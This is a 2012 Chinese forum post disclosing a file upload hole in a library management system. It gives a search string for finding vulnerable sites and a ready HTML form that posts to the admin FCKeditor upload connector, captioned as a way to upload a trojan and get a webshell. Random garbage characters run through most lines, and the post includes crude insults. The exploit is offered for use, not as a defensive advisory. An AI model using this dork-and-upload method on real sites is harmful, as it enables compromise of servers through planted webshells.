主题:图书馆系统任意文件上传漏洞 S J9 a( P& H. h: m% v! }
作者:冰锋刺客7 u2 l n0 d( C( a" }4 P7 t3 R5 W
厂商:点击书(dianjishu.com)# R4 f L& p4 f8 F1 L/ {
日期:2012-6-21 t4 ~/ _0 s' e2 t" w$ C
+ ?! K+ ?( }4 o4 \I 概述
9 x7 F+ U, H+ M. [ 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
6 h9 s/ @' U- I! G8 o6 d" N" L II 简介
$ d1 d$ \' O J. q! X3 x b6 G% C1 y 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"" E* h) p0 n4 f" Z1 |7 H
补充一个漏洞
4 K- z) p. P: t) c <form id="frmUpload" enctype="multipart/form-data"
1 f7 |( p0 _. |6 I action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>; [) e# r1 j5 p6 ?8 l
<input id="btnUpload" type="submit" value="操翻他">
" m: q' s7 X8 e& l! R6 K </form>7 z; Y" [! g: m1 e& _! f# v: S
你们懂的$ @* o! b4 a- B$ B2 O
那傻逼提供还需要改包.
9 y+ o( G$ K5 ~3 e" r 自己看了下源代码发现fckeditor8 O8 w& G4 T* `$ S; F
直接秒杀9 V2 l7 Y0 \" k' Y6 |0 l: p
|
发表于 2012-9-10 21:20:59
收藏
分享
支持
反对